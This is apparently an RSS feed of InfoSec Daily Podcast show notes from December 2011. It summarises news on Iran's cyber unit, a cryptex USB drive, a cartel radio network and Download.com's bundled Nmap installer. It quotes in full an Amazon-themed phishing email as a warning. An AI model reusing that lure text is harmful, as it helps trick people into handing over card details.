<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2010 the Iranian Islamic Revolution Guards Corps (IRGC) set up its first official cyber warfare division.Since then, its budget and focus has indicated the intention of growing these cyber warfare capabilities.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Education is considered a top priority in the strategy, with increased attention to computer engineering-specific cyber security programs. The IRGC budget on cyber capabilities is estimated to be US$76 million.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The IRGC&rsquo;s cyber warfare capabilities are believed to include the following weapons: compromised counterfeit computer software,wireless data communications jammers, computer viruses and worms, cyber data collection exploitation, computer and network reconnaissance, and embedded Trojan time bombs.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyber personnel force is estimated to be 2,400, with an additional 1,200 in reserves or at the militia level. In June 2011 Iran announced that the Khatam al-Anbiya Base, which is tasked with protecting Iranian cyberspace, is now capable to counter any cyber attack from abroad, a claim that will likely be tested soon given the volatile nature of cyberspace.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In August 2011 Iran challenged the United States and Israel, stating that they are ready to prove themselves with their cyber warfare capabilities. Should the Iranian cyber army be provoked, Iran would combat these operations with their own &ldquo;very strong&rdquo; defensive capabilities. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2011/12/05/amazon-phishing-attack-claims-your-account-is-about-to-expire"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/12/05/amazon-phishing-attack-claims-your-account-is-about-to-expire</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you received an email telling you that your Amazon.com account is about to expire? Does the message urge you to confirm that you need to confirm &quot;wether&quot; (sic) you wish to continue to use the account or risk deactivation?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Well, hold up a minute. Because if you respond to the notification in haste, you could be repenting at leisure.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercriminals have widely spammed out an attack via email, posing as Amazon, in an attempt to trick users into handing over their credentials.</span><img height="412px;" src="https://lh5.googleusercontent.com/4H6Q0P1z7cYiBX0UuYPwMKnOqwOJ7udtJCxeQ-iv5kW9YTSkWsYvoaTPxZYTvS5jCquwgUcUPGrQevlFVemGlPOQrH4zuDNz_4Yq2Xoxdkz97BKSDHM" width="498px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Subject:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> You have (1) Message from Amazon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attached file:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> NO003950033.html</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Message body:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear customer,</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Your online account is about to expire and will be deactivated.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please confirm wether you want to continue using Amazon or not.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the answer is yes, download and complete the attached form.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the answer is no, please ignore this e-mail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Best wishes,</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon Team</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Note &#8211; Do not reply to this e-mail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sophos products detect the attached file as</span><a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EPhish-AZ.aspx"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Troj/Phish-AZ</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and intercept the message as spam.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you made the mistake of opening the attachment, you would be faced with a web form which asks you for your credit card details, date of birth and so forth before uploading them to a remote web server.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3322875/da-vinci-code-inspires-secure-usb-drive"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3322875/da-vinci-code-inspires-secure-usb-drive</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Taking inspiration from Dan Brown&rsquo;s </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Da Vinci Code</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a US startup has fused a USB flash drive with a &lsquo;Cryptex&rsquo; device, a metal cylinder that can only be opened by setting the correct combination on a rotating barrel.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest</span><a href="http://vimeo.com/32704540"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Crypteks</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (notice the different spelling) is not the first device of its kind &ndash; designs have been circulating on the Internet since the Da Vinci code resurrected what is probably an older idea &ndash; but it does look like the most interesting to date.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The external 8cm barrel comprises</span><a href="http://news.techworld.com/security/3322875/da-vinci-code-inspires-secure-usb-drive/Da%20Vinci%20Code%20inspires%20super-secure%20USB%20drive"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> five aluminium alloy rotating rings</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on which each has printed the 26 letters of the English alphabet. Removing the USB flash drive from within the cylinder involves entering the correct combination of which there are 14,348,907 possible combinations thanks to the decision to adopt letters on each ring rather than numbers.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/05/mexico_shutters_cartel_mobile_network/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/05/mexico_shutters_cartel_mobile_network/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mexican government has shut down a secret mobile network reckoned to be run by one of the country&#39;s drug cartels, possibly the ruthless Zetas.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Military army troops confiscated 1,400 radios, 2,600 mobile phones, computer equipment, 167 antennas and 166 power supplies including solar panels as part of the operation. The kit is thought to have powered an encrypted mobile phone network that spanned four border states in northern Mexico.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mexican Defence department said that the network had been used by drug runners to communicate among themselves and to track military movements. The Zetas, who are fighting a ruthless turf war against their former bosses in the Gulf Cartel, are big players in all four states covered by the covert network (Tamaulipas, Nuevo Leon, Coahuila and San Luis Potosi).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last summer the Mexican navy dismantled a communications network linked to the Zetas in the Gulf state of Veracruz.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://seclists.org/nmap-hackers/2011/5"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://seclists.org/nmap-hackers/2011/5</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">From</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Fyodor &lt;fyodor () insecure org&gt;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Date</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Mon, 5 Dec 2011 14:35:30 -0800</span></p>
<hr />
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hi Folks. &nbsp;I&#39;ve just discovered that C|Net&#39;s Download.Com site has<br class="kix-line-break" /><br />
	started wrapping their Nmap downloads (as well as other free software<br class="kix-line-break" /><br />
	like VLC) in a trojan installer which does things like installing a<br class="kix-line-break" /><br />
	sketchy &quot;StartNow&quot; toolbar, changing the user&#39;s default search engine<br class="kix-line-break" /><br />
	to Microsoft Bing, and changing their home page to Microsoft&#39;s MSN.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	The way it works is that C|Net&#39;s download page (screenshot attached)<br class="kix-line-break" /><br />
	offers what they claim to be Nmap&#39;s Windows installer. &nbsp;They even<br class="kix-line-break" /><br />
	provide the correct file size for our official installer. &nbsp;But users<br class="kix-line-break" /><br />
	actually get a Cnet-created trojan installer. &nbsp;That program does the<br class="kix-line-break" /><br />
	dirty work before downloading and executing Nmap&#39;s real installer.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Of course the problem is that users often just click through installer<br class="kix-line-break" /><br />
	screens, trusting that download.com gave them the real installer and<br class="kix-line-break" /><br />
	knowing that the Nmap project wouldn&#39;t put malicious code in our<br class="kix-line-break" /><br />
	installer. &nbsp;Then the next time the user opens their browser, they<br class="kix-line-break" /><br />
	find that their computer is hosed with crappy toolbars, Bing searches,<br class="kix-line-break" /><br />
	Microsoft as their home page, and whatever other shenanigans the<br class="kix-line-break" /><br />
	software performs! &nbsp;The worst thing is that users will think we (Nmap<br class="kix-line-break" /><br />
	Project) did this to them!<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	I took and attached a screen shot of the C|Net trojan Nmap installer<br class="kix-line-break" /><br />
	in action. &nbsp;Note how they use our registered &quot;Nmap&quot; trademark in big<br class="kix-line-break" /><br />
	letters right above the malware &quot;special offer&quot; as if we somehow<br class="kix-line-break" /><br />
	endorsed or allowed this. &nbsp;Of course they also violated our trademark<br class="kix-line-break" /><br />
	by claiming this download is an Nmap installer when we have nothing to<br class="kix-line-break" /><br />
	do with the proprietary trojan installer.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	In addition to the deception and trademark violation, and potential<br class="kix-line-break" /><br />
	violation of the Computer Fraud and Abuse Act, this clearly violates<br class="kix-line-break" /><br />
	Nmap&#39;s copyright. &nbsp;This is exactly why Nmap isn&#39;t under the plain GPL.<br class="kix-line-break" /><br />
	Our license (</span><a href="http://nmap.org/book/man-legal.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://nmap.org/book/man-legal.html</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) specifically adds a<br class="kix-line-break" /><br />
	clause forbidding software which &quot;integrates/includes/aggregates Nmap<br class="kix-line-break" /><br />
	into a proprietary executable installer&quot; unless that software itself<br class="kix-line-break" /><br />
	conforms to various GPL requirements (this proprietary C|Net<br class="kix-line-break" /><br />
	download.com software and the toolbar don&#39;t). &nbsp;We&#39;ve long known that<br class="kix-line-break" /><br />
	malicious parties might try to distribute a trojan Nmap installer, but<br class="kix-line-break" /><br />
	we never thought it would be C|Net&#39;s Download.com, which is owned by<br class="kix-line-break" /><br />
	CBS! &nbsp;And we never thought Microsoft would be sponsoring this<br class="kix-line-break" /><br />
	activity!<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	It is worth noting that C|Net&#39;s exact schemes vary. &nbsp;Here is a story<br class="kix-line-break" /><br />
	about their shenanigans:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	</span><a href="http://www.extremetech.com/computing/93504-download-com-wraps-downloads-in-bloatware-lies-about-motivations"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://www.extremetech.com/computing/93504-download-com-wraps-downloads-in-bloatware-lies-about-motivations</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	It is interesting to compare the trojaned VLC screenshot in that<br class="kix-line-break" /><br />
	article with the Nmap one I&#39;ve attached. &nbsp;In that case, the user just<br class="kix-line-break" /><br />
	clicks &quot;Next step&quot; to have their machine infected. &nbsp;And they wrote<br class="kix-line-break" /><br />
	&quot;SAFE, TRUSTED, AND SPYWARE FREE&quot; in the trojan-VLC title bar. &nbsp;It is<br class="kix-line-break" /><br />
	telling that they decided to remove that statement in their newer<br class="kix-line-break" /><br />
	trojan installer. &nbsp;In fact, if we UPX-unpack the Trojan CNet<br class="kix-line-break" /><br />
	executable and send it to VirusTotal.com, it is detected as malware by<br class="kix-line-break" /><br />
	Panda, McAfee, F-Secure, etc:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	</span><a href="http://bit.ly/cnet-nmap-vt"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http://bit.ly/cnet-nmap-vt</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	According to Download.com&#39;s own stats, hundreds of people download the<br class="kix-line-break" /><br />
	trojan Nmap installer every week! &nbsp;So the first order of business is<br class="kix-line-break" /><br />
	to notify the community so that nobody else falls for this scheme.<br class="kix-line-break" /><br />
	Please help spread the word.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Of course the next step is to go after C|Net until they stop doing<br class="kix-line-break" /><br />
	this for ALL of the software they distribute. &nbsp;So far, the most they<br class="kix-line-break" /><br />
	have offered is:<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	&nbsp;&quot;If you would like to opt out of the Download.com Installer you can<br class="kix-line-break" /><br />
	&nbsp;&nbsp;submit a request to cnet-installer () cbsinteractive com &nbsp;All opt-out<br class="kix-line-break" /><br />
	&nbsp;&nbsp;requests are carefully reviewed on a case-by-case basis.&quot;<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	In other words, &quot;we&#39;ll violate your trademarks and copyright and<br class="kix-line-break" /><br />
	squandering your goodwill until you tell us to stop, and then we&#39;ll<br class="kix-line-break" /><br />
	consider your request &#39;on a case-by-case basis&#39; depending on how much<br class="kix-line-break" /><br />
	money we make from infecting your users and how scary your legal<br class="kix-line-break" /><br />
	threat is.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	F*ck them! &nbsp;If anyone knows a great copyright attorney in the U.S.,<br class="kix-line-break" /><br />
	please send me the details or ask them to get in touch with me.<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Also, shame on Microsoft for paying C|Net to trojan open source<br class="kix-line-break" /><br />
	software!<br class="kix-line-break" /><br />
	<br class="kix-line-break" /><br />
	Cheers,<br class="kix-line-break" /><br />
	Fyodor</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-538-iphone-exploit-sentinel-lost-amazon-da-vinci-zetas-nmap-malware/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3235/0/infosec-daily-podcast-episode-538.mp3" length="18136229" type="audio/mpeg" />
		<itunes:duration>0:37:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 538 for December 5, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 538 for December 5, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Ettercap-NG has just been updated and released&#8230; &#160;Lazarus is out!
	http://ettercap.sourceforge.net/ 
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: https://community.rapid7.com/community/metasploit/blog/2011/11/08/metasploit-framework-sighting-exploiting-iphone
	Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller, @0xcharlie, using Metasploit&#39;s Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone&#39;s file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple&#39;s coding signing requirements, which allowed him to run arbitrary code on the iPhone.
	Source: 
	https://www.infosecisland.com/blogview/18536-Was-Irans-Downing-of-RQ-170-Related-to-the-Malware-Infection-at-Creech-AFB.html
	The Washington Post has reported that Iran&#39;s cyber warfare unit took over the controls of a Lockheed Martin RQ-170 Sentinel stealth drone flying over Eastern Iran and landed it with minimal damage.
	As of this writing, the U.S. Air Force hasn&#39;t yet confirmed or denied the attack. I&#39;ve left a message with the on-call PA officer at Creech Air Force Base, which is the home of the 432d Wing which flies RQ-170 Sentinels according to this factsheet.
	Creech Air Force Base, as you may recall, suffered a malware infection of its Reaper and Predator Ground Control Stations last October. After Noah Shachtman broke the story, the Air Force issued a press release claiming that the malware was a simple &#34;credential stealer&#34; and not a &#34;keylogger&#34;, which is a distinction without a difference as I pointed out here.
	Approximately one and a half months after the Air Force issued that statement, Iran claims to have successfully compromised the flying operations of one of its drones &#8211; possibly flown out of the same Air Forc[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>yes</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 537 &#8211; Weekly wrap up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-537-weekly-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-537-weekly-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 04 Dec 2011 03:06:16 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3230</guid>
		<description><![CDATA[&#160; Episode 537 &#8211; Weekly wrap up with Dr. b0n3z InfoSec Daily Podcast Episode 537 for December 3, 2011. &#160;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad. &#160; Guests: gradius, warrax, brew_ninja, fr0ntpag3, and yngjungian. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<div style="background-color: transparent"><span>Episode 537 &#8211; Weekly wrap up with Dr. b0n3z</span><br />
	<span>InfoSec Daily Podcast Episode 537 for December 3, 2011. &nbsp;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.</span></p>
<p>&nbsp;</p>
<p>Guests: gradius, warrax, brew_ninja, fr0ntpag3, and yngjungian.</p>
<p><span>Announcements:</span><br />
		<span>Brad Smith (theNurse) </span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
		<span>When: Starts January 24, 2012</span><br />
		<span>Where: Atlanta, GA</span><br />
		<span>Discount Code: </span><br />
		<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p><span>ShmooCon 2012</span><br />
		<span>When: January 27th-29th, 2012</span><br />
		<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
		<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a><br />
		<span>Second round of tickets sold out!</span></p>
<p><span>Thotcon 0&#215;3</span><br />
		<span>When: Friday April 27th, 2012</span><br />
		<span>Where: Secret location in Chicago</span><br />
		<a href="http://tickets.thotcon.org/"><span>http://tickets.thotcon.org/</span></a><br />
		<span>Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></p>
<p><span>AIDE 2012 </span><br />
		<span>When: May 21-25, 2012 </span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></p>
<p><span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p><span>Stories:</span></p>
